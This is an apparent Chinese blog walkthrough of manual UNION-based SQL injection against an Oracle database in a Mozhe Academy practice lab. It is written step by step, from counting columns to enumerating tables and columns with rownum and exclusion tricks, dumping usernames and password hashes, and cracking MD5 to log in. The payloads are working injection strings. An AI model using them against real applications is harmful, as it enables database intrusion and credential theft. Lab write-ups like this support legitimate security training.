墨者:SQL手工注入漏洞测试(Oracle数据库)

一、SQL手工注入漏洞测试(Oracle数据库)

本文以墨者学院靶场为例,演示Oracle数据库的手工SQL注入全过程。靶场以自己的地址为准:http://124.70.64.48:49921/new_list.php?id=1

二、注入步骤详解(如下指令去掉了id之前的内容)

1. 判断字段数量

sql 复制代码
id=1 order by 3

通过递增order by后的数字,当报错时说明超出字段数。本例中order by 2不报错,order by 3报错,说明有2个字段。

2. 确定回显位置

sql 复制代码
id=1 union select 'null','null' from dual

使用null占位,第1、2列会回显数据。

3. 获取数据库信息

sql 复制代码
id=1 union select (SELECT global_name FROM global_name),'null' from dual

使用global_name获取数据库全局名称。

4. 获取表名

模糊查询表名
sql 复制代码
id=1 union select (select table_name from user_tables where rownum=1 and table_name like '%user%'),'null' from dual

5. 获取字段名

获取首个字段
sql 复制代码
id=1 union select (select column_name from user_tab_columns where rownum =1 and table_name='sns_users' ),'null' from dual
获取其他字段
sql 复制代码
id=1 union select (select column_name from user_tab_columns where rownum=1 and table_name='sns_users' and column_name != 'USER_NAME'),'null' from dual

为什么要排除已查字段?

  1. Oracle没有类似MySQL的limit offset语法
  2. rownum=1只能获取第一条记录
  3. 通过column_name != '已获取字段名'可以获取下一条记录
  4. 确保完整枚举所有字段

6. 获取数据

获取首条记录
sql 复制代码
id=1 union select USER_NAME,USER_PWD from "sns_users" where rownum=1
排除已获取记录
sql 复制代码
id=1 union select USER_NAME,USER_PWD from "sns_users" where rownum=1 and USER_NAME != 'zhong'

id=1 union select USER_NAME,USER_PWD from "sns_users" where rownum=1 and USER_NAME != 'zhong' and USER_NAME != 'hu'


为什么要用排除法获取数据?

  1. Oracle的rownum限制导致无法直接获取第N条记录
  2. 通过USER_NAME != '已知用户名'可以遍历所有记录
  3. 这是Oracle环境下最可靠的数据枚举方法
  4. 可以确保不遗漏任何数据

7. MD5解密后,手动登录,获取Key

MD5工具地址:https://www.cmd5.com/

三、关键指令解析

指令/函数 说明 典型应用场景
order by 判断字段数量 确定UNION查询的列数
union select 联合查询 获取系统数据
dual Oracle虚拟表 用于不需要真实表的查询
global_name 数据库全局名 获取当前数据库信息
user_tables 用户表视图 枚举数据库表
user_tab_columns 用户列视图 获取表结构
rownum 行号限制 Oracle特有的分页方式
not in/!= 排除查询 解决rownum限制的关键
相关推荐
NocoBase1 小时前
10 个开源工具,快速构建数据应用
数据库·低代码·开源
麻辣清汤2 小时前
结合BI多维度异常分析(日期-> 商家/渠道->日期(商家/渠道))
数据库·python·sql·finebi
Kan先生3 小时前
对象存储解决方案:MinIO 的架构与代码实战
数据库·python
超级迅猛龙3 小时前
保姆级Debezium抽取SQL Server同步kafka
数据库·hadoop·mysql·sqlserver·kafka·linq·cdc
杨过过儿4 小时前
【Task02】:四步构建简单rag(第一章3节)
android·java·数据库
····懂···5 小时前
攻克PostgreSQL专家认证
数据库·postgresql
每天都在想吃啥5 小时前
day31 SQLITE
数据库·sqlite
m0_748254098 小时前
2025最新华为云国际版注册图文流程-不用绑定海外信用卡注册
服务器·数据库·华为云
大新屋8 小时前
MongoDB 分片集群修改管理员密码
数据库·mongodb
ejinxian8 小时前
MySQL/Kafka数据集成同步,增量同步及全量同步
数据库·mysql·kafka